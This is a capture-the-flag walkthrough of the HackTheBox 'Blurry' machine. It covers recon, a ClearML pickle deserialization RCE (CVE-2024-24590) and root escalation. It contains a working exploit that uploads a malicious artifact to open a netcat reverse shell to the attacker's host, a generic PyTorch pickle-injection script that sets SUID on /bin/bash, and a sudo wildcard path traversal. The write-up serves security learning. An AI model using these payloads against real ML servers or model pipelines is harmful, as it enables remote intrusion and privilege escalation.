Blurry | HackTheBox

Overview

| Title | Blurry |
|---|---|
| Difficulty | Medium |
| Machine | Linux |
| Maker |  |

About Blurry

Information Gathering

Scanned all TCP ports:

nmap -p- -vv --min-rate 5000 10.10.11.19 -oA nmap/ports

    Nmap scan report for app.blurry.htb (10.10.11.19)
    Host is up, received conn-refused (0.21s latency).
    Scanned at 2024-10-13 12:51:47 IST for 246s
    Not shown: 43506 filtered ports, 22027 closed ports
    Reason: 43506 no-responses and 22027 conn-refused

    PORT   STATE SERVICE REASON
    22/tcp open  ssh     syn-ack
    80/tcp open  http    syn-ack

Enumerated open TCP ports:

nmap -p22,80 -vv --min-rate 5000 -sC -sV -oA nmap/service 10.10.11.19

    Nmap scan report for app.blurry.htb (10.10.11.19)
    Host is up, received syn-ack (0.30s latency).
    Scanned at 2024-10-13 13:03:02 IST for 16s

    PORT   STATE SERVICE REASON  VERSION
    22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
    80/tcp open  http    syn-ack nginx 1.18.0
    |_http-favicon: Unknown favicon MD5: 2CBD65DC962D5BF762BCB815CBD5EFCC
    | http-methods:
    |_  Supported Methods: GET HEAD
    |_http-server-header: nginx/1.18.0
    |_http-title: ClearML
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only two ports are open: 22 (SSH) and 80 (HTTP).

Enumeration

Port 80 - HTTP (Nginx 1.18.0)

Let’s add app.blurry.htb to /etc/hosts

echo -e '10.10.11.19\tapp.blurry.htb' | sudo tee -a /etc/hosts

I then fuzzed the Host header to check for other subdomains, filtering out the 169-byte default response with -fs 169:

ffuf -u http://10.10.11.19/ -H 'Host: FUZZ.blurry.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 169

files.blurry.htb



chat.blurry.htb



We can create a new account and see all the chats:



The announcement channel also contains some information that might come in handy later.

app.blurry.htb

This host runs a ClearML server, an open-source MLOps platform.



Create a new account and view the dashboard



After looking at some of the requests, I found the ClearML version used by this application.

This version is vulnerable to RCE.

Exploitation

CVE-2024-24590 - ClearML Pickle Artifact Upload RCE

An attacker can execute arbitrary code on an end user’s system by uploading a malicious pickle file as an artifact. The deserialization flaw is triggered when a user calls the get method within the Artifact class to download and load the file into memory.

The research team from HiddenLayer found six zero-days, including this one, affecting both the open-source and enterprise versions of ClearML. You can find information about the other vulnerabilities in their blog.

In Python, the pickle module is often used to store machine learning models for training, evaluation, and sharing. However, pickle is inherently insecure: a pickle stream can instruct the loader to call arbitrary functions, so deserializing untrusted data can execute arbitrary commands. If user-created pickle files are deserialized without proper validation, the result is a remote code execution vulnerability. You can learn more about pickle and insecure deserialization vulnerabilities in these articles:


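To make the mechanism concrete, here is a minimal, harmless sketch of how `__reduce__` lets a pickle decide what gets called at load time. The `Demo` class is hypothetical and only calls `len`; a real payload would return something like `(os.system, (command,))` instead.

```python
import pickle


class Demo:
    """Hypothetical stand-in object used only for this illustration."""

    def __reduce__(self):
        # Tell pickle to "rebuild" this object by calling len("pickle").
        # The loader performs this call during deserialization.
        return (len, ("pickle",))


blob = pickle.dumps(Demo())
result = pickle.loads(blob)  # the loader calls len("pickle") here

# The loaded value is the return value of the call, not a Demo instance.
print(type(result).__name__, result)
```

Note that the class itself never needs to exist on the loading side: the stream only references the callable and its arguments.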

The vulnerability was inside the Artifact.get method, where the application loads the pickle object directly into memory without any checks. ClearML fixed it by adding a hash validation that compares the hash of the local file with the hash of the uploaded artifact.
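The idea behind such a check can be sketched as follows. This is not ClearML's actual patch, only an illustration under stated assumptions: the helper names `sha256_of` and `load_if_hash_matches` are hypothetical, and SHA-256 is chosen here for the example.

```python
import hashlib
import os
import pickle
import tempfile


def sha256_of(path):
    """Return the hex SHA-256 digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def load_if_hash_matches(path, expected_hash):
    """Unpickle the file only if its hash equals the expected value."""
    if sha256_of(path) != expected_hash:
        raise ValueError("artifact hash mismatch; refusing to unpickle")
    with open(path, "rb") as handle:
        return pickle.load(handle)


# Demo with a benign artifact written to a temporary file.
with tempfile.NamedTemporaryFile(delete=False, suffix=".pkl") as tmp:
    tmp.write(pickle.dumps([1, 2, 3]))
    artifact_path = tmp.name

known_hash = sha256_of(artifact_path)
loaded = load_if_hash_matches(artifact_path, known_hash)
print(loaded)
os.remove(artifact_path)
```

A hash check only confirms that the file is the one that was recorded; it does not make unpickling untrusted data safe in general.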

To exploit this vulnerability, we first need to upload a malicious artifact to the ClearML server. If any user downloads and loads the artifact into memory using the Artifact.get method, we gain a reverse shell on their machine as that user. From the RocketChat instance, we know that the admin periodically runs an automated task that reviews all artifacts with a review tag inside the Black Swan project.

Thus, we only need to upload the artifact to the Black Swan project with a review tag; the admin’s task will download and load it, giving us a reverse shell.

To exploit this we need to install the clearml pip package:

pip install clearml



Then, in the ClearML web interface, go to Settings -> Workspace and create new credentials.



Now add the configurations by running the clearml-init command, which is installed when you install the clearml pip package.

Note: Don’t forget to add api.blurry.htb to your /etc/hosts file as well.



Now let’s create an exploit to upload our artifact to the server:

    from clearml import Task
    import pickle, os

    class RunCommand:
        def __reduce__(self):
            ip = "" # Enter your ip address
            port = "" # Enter listening port
            command = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc {ip} {port} >/tmp/f"
            return (os.system, (command,))

    def main():
        command = RunCommand()
        task = Task.init(project_name="Black Swan", tags=['review'], task_name='exploit')
        task.upload_artifact(name='pickle_artifact', artifact_object=command, retries=2, wait_on_upload=True)

    if __name__ == "__main__":
        main()

And now start a netcat listener:

nc -lnvp 1234

Then run the exploit:

python3 exploit.py

Wait for the admin’s review task to run:



Let’s copy the .ssh/id_rsa file to our machine and use it to log in over SSH.

chmod 600 id_rsa

ssh jippity@10.10.11.19 -i id_rsa

Privilege Escalation



Local Enumeration







There are only two users on this machine. The user jippity can run /usr/bin/evaluate_model as root, which is a bash script:

    #!/bin/bash
    # Evaluate a given model against our proprietary dataset.
    # Security checks against model file included.

    if [ "$#" -ne 1 ]; then
        /usr/bin/echo "Usage: $0 <path_to_model.pth>"
        exit 1
    fi

    MODEL_FILE="$1"
    TEMP_DIR="/opt/temp"
    PYTHON_SCRIPT="/models/evaluate_model.py"

    /usr/bin/mkdir -p "$TEMP_DIR"

    file_type=$(/usr/bin/file --brief "$MODEL_FILE")

    # Extract based on file type
    if [[ "$file_type" == *"POSIX tar archive"* ]]; then
        # POSIX tar archive (older PyTorch format)
        /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
    elif [[ "$file_type" == *"Zip archive data"* ]]; then
        # Zip archive (newer PyTorch format)
        /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
    else
        /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
        exit 2
    fi

    /usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
        fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

        if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
            /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
            /bin/rm "$MODEL_FILE"
            break
        fi
    done

    /usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
    /bin/rm -rf "$TEMP_DIR"

    if [ -f "$MODEL_FILE" ]; then
        /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
        /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
    fi

The script requires one argument, the path to the model file, which must be either a tar or a zip archive.

It extracts the archive into /opt/temp, then uses fickling, a static analyzer for pickle files, to check whether any of the extracted pickle files is malicious. The model is deleted only when fickling rates a file as OVERTLY_MALICIOUS.

If the model file survives the check, the script finally runs /models/evaluate_model.py with the model file as its argument.
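The decision the script makes with jq can be sketched in Python as below. The function name `is_rejected` is hypothetical, and the sample reports are hand-written stand-ins rather than real fickling output; only the `severity` key and the `OVERTLY_MALICIOUS` value are taken from the script.

```python
import json


def is_rejected(fickling_json):
    """Mirror the jq filter: reject only an exact OVERTLY_MALICIOUS rating."""
    report = json.loads(fickling_json)
    return report.get("severity") == "OVERTLY_MALICIOUS"


# Hand-written sample reports (assumptions, not captured tool output).
blocked_report = json.dumps({"severity": "OVERTLY_MALICIOUS"})
other_report = json.dumps({"severity": "SOME_LOWER_RATING"})

print(is_rejected(blocked_report))
print(is_rejected(other_report))
```

Because the comparison is an exact string match, any pickle that the analyzer rates below that single level passes through to the Python script, which is the gap the rest of this section targets.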

    import torch
    import torch.nn as nn
    from torchvision import transforms
    from torchvision.datasets import CIFAR10
    from torch.utils.data import DataLoader, Subset
    import numpy as np
    import sys


    class CustomCNN(nn.Module):
        def __init__(self):
            super(CustomCNN, self).__init__()
            self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, padding=1)
            self.conv2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1)
            self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)
            self.fc1 = nn.Linear(in_features=32 * 8 * 8, out_features=128)
            self.fc2 = nn.Linear(in_features=128, out_features=10)
            self.relu = nn.ReLU()

        def forward(self, x):
            x = self.pool(self.relu(self.conv1(x)))
            x = self.pool(self.relu(self.conv2(x)))
            x = x.view(-1, 32 * 8 * 8)
            x = self.relu(self.fc1(x))
            x = self.fc2(x)
            return x


    def load_model(model_path):
        model = CustomCNN()

        state_dict = torch.load(model_path)
        model.load_state_dict(state_dict)

        model.eval()
        return model


    def prepare_dataloader(batch_size=32):
        transform = transforms.Compose([
            transforms.RandomHorizontalFlip(),
            transforms.RandomCrop(32, padding=4),
            transforms.ToTensor(),
            transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),
        ])

        dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)
        subset = Subset(dataset, indices=np.random.choice(len(dataset), 64, replace=False))
        dataloader = DataLoader(subset, batch_size=batch_size, shuffle=False)
        return dataloader


    def evaluate_model(model, dataloader):
        correct = 0
        total = 0
        with torch.no_grad():
            for images, labels in dataloader:
                outputs = model(images)
                _, predicted = torch.max(outputs.data, 1)
                total += labels.size(0)
                correct += (predicted == labels).sum().item()

        accuracy = 100 * correct / total
        print(f'[+] Accuracy of the model on the test dataset: {accuracy:.2f}%')


    def main(model_path):
        model = load_model(model_path)
        print("[+] Loaded Model.")
        dataloader = prepare_dataloader()
        print("[+] Dataloader ready. Evaluating model...")
        evaluate_model(model, dataloader)


    if __name__ == "__main__":
        if len(sys.argv) < 2:
            print("Usage: python script.py <path_to_model.pth>")
        else:
            model_path = sys.argv[1] # Path to the .pth file
            main(model_path)

To load a malicious pickle file and run arbitrary commands, we need to create a pickle file that bypasses fickling’s checks.

After some searching, I found another blog post by HiddenLayer: Weaponizing ML Models with Ransomware. It explains some techniques we can use to modify existing models so that they execute arbitrary commands.



There’s already a pretrained PyTorch model in the /models directory. PyTorch uses .pth files to store model weights and other relevant information for deep learning models. If we extract the demo_model.pth file, we can see there’s a data.pkl file inside it.
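For a zip-format model, the pickle members can also be listed without extracting anything to disk. The sketch below builds a tiny stand-in archive in memory so it runs without PyTorch; the member names in `make_demo_archive` are assumptions for illustration, and the filter mirrors the `*.pkl` / `pickle` names that the evaluate_model script searches for.

```python
import io
import zipfile


def pickle_members(archive_bytes):
    """Return archive members named *.pkl or exactly 'pickle'."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        return [
            name
            for name in archive.namelist()
            if name.endswith(".pkl") or name.rsplit("/", 1)[-1] == "pickle"
        ]


def make_demo_archive():
    """Build a stand-in zip with a hypothetical layout (not a real model)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("demo_model/data.pkl", b"placeholder")
        archive.writestr("demo_model/version", b"3\n")
    return buffer.getvalue()


print(pickle_members(make_demo_archive()))
```

On the target, the same function could be pointed at the bytes of a real .pth file to see which members the script would hand to fickling.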

We can inject the model’s data.pkl file with an instruction to execute arbitrary code using the python script from the blog.

Privilege Escalation

    import os
    import argparse
    import pickle
    import struct
    import shutil
    from pathlib import Path

    import torch


    class PickleInject():
        """Pickle injection. Pretends to be a "module" to work with torch."""
        def __init__(self, inj_objs, first=True):
            self.__name__ = "pickle_inject"
            self.inj_objs = inj_objs
            self.first = first

        class _Pickler(pickle._Pickler):
            """Reimplementation of Pickler with support for injection"""
            def __init__(self, file, protocol, inj_objs, first=True):
                super().__init__(file, protocol)

                self.inj_objs = inj_objs
                self.first = first

            def dump(self, obj):
                """Pickle data, inject object before or after"""
                if self.proto >= 2:
                    self.write(pickle.PROTO + struct.pack("<B", self.proto))
                if self.proto >= 4:
                    self.framer.start_framing()

                # Inject the object(s) before the user-supplied data?
                if self.first:
                    # Pickle injected objects
                    for inj_obj in self.inj_objs:
                        self.save(inj_obj)

                # Pickle user-supplied data
                self.save(obj)

                # Inject the object(s) after the user-supplied data?
                if not self.first:
                    # Pickle injected objects
                    for inj_obj in self.inj_objs:
                        self.save(inj_obj)

                self.write(pickle.STOP)
                self.framer.end_framing()

        def Pickler(self, file, protocol):
            # Initialise the pickler interface with the injected object
            return self._Pickler(file, protocol, self.inj_objs)

        class _PickleInject():
            """Base class for pickling injected commands"""
            def __init__(self, args, command=None):
                self.command = command
                self.args = args

            def __reduce__(self):
                return self.command, (self.args,)

        class System(_PickleInject):
            """Create os.system command"""
            def __init__(self, args):
                super().__init__(args, command=os.system)

        class Exec(_PickleInject):
            """Create exec command"""
            def __init__(self, args):
                super().__init__(args, command=exec)

        class Eval(_PickleInject):
            """Create eval command"""
            def __init__(self, args):
                super().__init__(args, command=eval)

        class RunPy(_PickleInject):
            """Create runpy command"""
            def __init__(self, args):
                import runpy
                super().__init__(args, command=runpy._run_code)

            def __reduce__(self):
                return self.command, (self.args,{})


    parser = argparse.ArgumentParser(description="PyTorch Pickle Inject")
    parser.add_argument("model", type=Path)
    parser.add_argument("command", choices=["system", "exec", "eval", "runpy"])
    parser.add_argument("args")
    parser.add_argument("-v", "--verbose", help="verbose logging", action="count")

    args = parser.parse_args()

    command_args = args.args

    # If the command arg is a path, read the file contents
    if os.path.isfile(command_args):
        with open(command_args, "r") as in_file:
            command_args = in_file.read()

    # Construct payload
    if args.command == "system":
        payload = PickleInject.System(command_args)
    elif args.command == "exec":
        payload = PickleInject.Exec(command_args)
    elif args.command == "eval":
        payload = PickleInject.Eval(command_args)
    elif args.command == "runpy":
        payload = PickleInject.RunPy(command_args)

    # Backup the model
    backup_path = "{}.bak".format(args.model)
    shutil.copyfile(args.model, backup_path)

    # Save the model with the injected payload
    torch.save(torch.load(args.model), f=args.model, pickle_module=PickleInject([payload]))

Copy the script to the /tmp/ folder on the target as main.py.



Now we copy /models/demo_model.pth to /tmp and use the script to inject our command:

cd /tmp

cp /models/demo_model.pth .

python3 main.py ./demo_model.pth system 'chmod u+s /bin/bash'

This rewrites the copied model in place so that loading it executes chmod u+s /bin/bash, and keeps a backup of the original file as demo_model.pth.bak.
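Why the model still loads normally after injection can be shown with a stripped-down version of the same trick that needs no PyTorch. This is a sketch, not the blog's script: `Marker`, `InjectingPickler`, and `dumps_with_injection` are hypothetical names, the payload is a harmless `print`, and unlike the script above it writes a POP opcode to discard the injected call's return value. It relies on CPython's pure-Python `pickle._Pickler`, as the original script does.

```python
import io
import pickle
import struct


class Marker:
    """Harmless stand-in for a payload: unpickling it calls print(message)."""

    def __init__(self, message):
        self.message = message

    def __reduce__(self):
        return (print, (self.message,))


class InjectingPickler(pickle._Pickler):
    """Pure-Python pickler that writes one extra object ahead of the data."""

    def __init__(self, file, protocol, injected):
        super().__init__(file, protocol)
        self.injected = injected

    def dump(self, obj):
        if self.proto >= 2:
            self.write(pickle.PROTO + struct.pack("<B", self.proto))
        if self.proto >= 4:
            self.framer.start_framing()
        self.save(self.injected)  # emits the call to print(...)
        self.write(pickle.POP)    # discard that call's return value
        self.save(obj)            # the legitimate data comes last
        self.write(pickle.STOP)   # STOP returns the top of the stack
        self.framer.end_framing()


def dumps_with_injection(obj, injected):
    """Serialize obj with the injected object placed first in the stream."""
    buffer = io.BytesIO()
    InjectingPickler(buffer, pickle.DEFAULT_PROTOCOL, injected).dump(obj)
    return buffer.getvalue()


weights = {"fc1.bias": [0.1, 0.2]}  # hypothetical stand-in for a state dict
blob = dumps_with_injection(weights, Marker("injected call ran"))
restored = pickle.loads(blob)  # prints the marker message while loading
print(restored == weights)
```

The loader runs the injected call first and then returns the untouched data, so the consumer sees a valid object and has no reason to suspect anything happened.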

Now we just have to get this updated model past the path restriction on the /usr/bin/evaluate_model command, for example by moving it into /models/.



Since the allowed path contains a * wildcard, we don’t actually need to move the updated model into the /models/ directory; a path that starts with /models/ and traverses back out is accepted too:

sudo /usr/bin/evaluate_model /models/../tmp/demo_model.pth
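The effect of the wildcard can be sketched with Python's `fnmatch`, whose `*` also matches `/` characters. The pattern `/models/*.pth` is an assumption about the rule shown in the screenshot, and sudo's own matching is only approximated here, so treat this as an illustration of the idea rather than a reimplementation.

```python
import fnmatch
import posixpath

# Assumed pattern for the permitted argument (not confirmed by the text).
ALLOWED_PATTERN = "/models/*.pth"


def matches_rule(path):
    """Glob-style check where '*' is allowed to span '/' separators."""
    return fnmatch.fnmatchcase(path, ALLOWED_PATTERN)


def resolved(path):
    """Collapse '..' components the way the filesystem lookup would."""
    return posixpath.normpath(path)


candidate = "/models/../tmp/demo_model.pth"
print(matches_rule(candidate))             # the string fits the pattern
print(resolved(candidate))                 # but it points into /tmp
print(matches_rule("/tmp/demo_model.pth"))  # the direct path does not fit
```

The check is done on the argument string, while the file that actually gets opened is whatever the path resolves to.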

With the SUID bit now set on /bin/bash, running /bin/bash -p gives a shell with root privileges. And we are root.

This machine focuses on security pitfalls in MLOps tooling. We exploited a remote code execution vulnerability (CVE-2024-24590) in ClearML through a malicious artifact upload: by abusing the insecure deserialization of pickle files, an attacker can execute arbitrary code on a victim’s system. For privilege escalation, we injected a command into an existing PyTorch model to gain root access.